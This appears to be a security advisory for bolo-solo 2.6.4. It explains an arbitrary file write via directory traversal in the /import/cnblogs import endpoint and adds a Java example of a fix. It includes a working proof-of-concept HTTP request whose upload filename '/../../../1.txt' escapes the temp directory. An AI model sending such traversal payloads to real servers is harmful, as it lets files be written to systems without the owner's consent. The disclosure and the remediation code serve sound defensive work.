In bolo-solo version 2.6.4, the /import/cnblogs endpoint has an arbitrary file write vulnerability because uploaded filenames are not validated.
Vulnerable file: src/main/java/org/b3log/solo/bolo/prop/BackupService.java
During import, the importFromCnblogs() method writes the uploaded file to a temporary location using its original filename directly, with no security validation of that filename. This allows directory traversal combined with arbitrary file upload and arbitrary file write.

The temporary file is supposed to be deleted afterwards, but because it has already been written to a directory other than temp/file, the deletion method cannot locate it. As a result, the file is never removed and remains where the filename placed it.

The final result is a successful directory traversal and file upload:

POC:
POST /import/cnblogs HTTP/1.1
Host: localhost:8080
Content-Length: 219
sec-ch-ua-platform: "Windows"
Accept-Language: zh-CN,zh;q=0.9
sec-ch-ua: "Not_A Brand";v="99", "Chromium";v="142"
sec-ch-ua-mobile: ?0
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: application/json, text/javascript, */*; q=0.01
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryWqUiXMVBVHBW0k6y
Origin: http://localhost:8080
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://localhost:8080/admin-index.do
Accept-Encoding: gzip, deflate, br
Connection: keep-alive

------WebKitFormBoundaryWqUiXMVBVHBW0k6y
Content-Disposition: form-data; name="file"; filename="/../../../1.txt"
Content-Type: application/x-zip-compressed

123123
------WebKitFormBoundaryWqUiXMVBVHBW0k6y--
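One way to close the hole described above, as an added example (not bolo-solo's code and not its actual fix): reduce the client-supplied filename to its last segment, resolve it under the temp directory, confirm containment, and have cleanup delete the exact path that was written. The class and method names are hypothetical, and the temp directory created in main() is a constructed stand-in for temp/file.

```java
import java.io.IOException;
import java.io.InputStream;
import java.nio.file.Files;
import java.nio.file.InvalidPathException;
import java.nio.file.Path;
import java.nio.file.StandardCopyOption;

public final class SafeTempUpload {   // hypothetical helper, not part of bolo-solo
    /** Maps a client-supplied filename to a path guaranteed to stay inside tempDir. */
    static Path resolveInside(Path tempDir, String clientName) throws IOException {
        String name = clientName == null ? "" : clientName;
        // Keep only the last segment; treat '/' and '\' as separators on every OS.
        int cut = Math.max(name.lastIndexOf('/'), name.lastIndexOf('\\'));
        String base = name.substring(cut + 1);
        if (base.isEmpty() || base.equals(".") || base.equals("..") || base.indexOf('\0') >= 0) {
            throw new IOException("invalid upload filename");
        }
        Path root = tempDir.toAbsolutePath().normalize();
        Path target;
        try {
            target = root.resolve(base).normalize();
        } catch (InvalidPathException e) {   // e.g. characters the platform forbids
            throw new IOException("invalid upload filename", e);
        }
        // Defence in depth: the normalized result must still be under the temp root.
        if (!target.startsWith(root)) {
            throw new IOException("upload path escapes temp directory");
        }
        return target;
    }

    /** Writes the upload and returns the exact path written, so cleanup deletes that same path. */
    static Path store(Path tempDir, String clientName, InputStream body) throws IOException {
        Path target = resolveInside(tempDir, clientName);
        Files.copy(body, target, StandardCopyOption.REPLACE_EXISTING);
        return target;   // caller: try { ...import... } finally { Files.deleteIfExists(target); }
    }

    public static void main(String[] args) throws IOException {
        Path tmp = Files.createTempDirectory("import-demo");
        // Constructed sample names; the first is the filename used in the PoC above.
        for (String n : new String[] {"/../../../1.txt", "..\\..\\evil.zip", "backup.zip", ".."}) {
            try {
                System.out.println(n + " -> stored as " + resolveInside(tmp, n).getFileName());
            } catch (IOException e) {
                System.out.println(n + " -> rejected: " + e.getMessage());
            }
        }
    }
}
```

Generating a random server-side name and ignoring the client filename entirely is a stricter alternative when the original name is not needed.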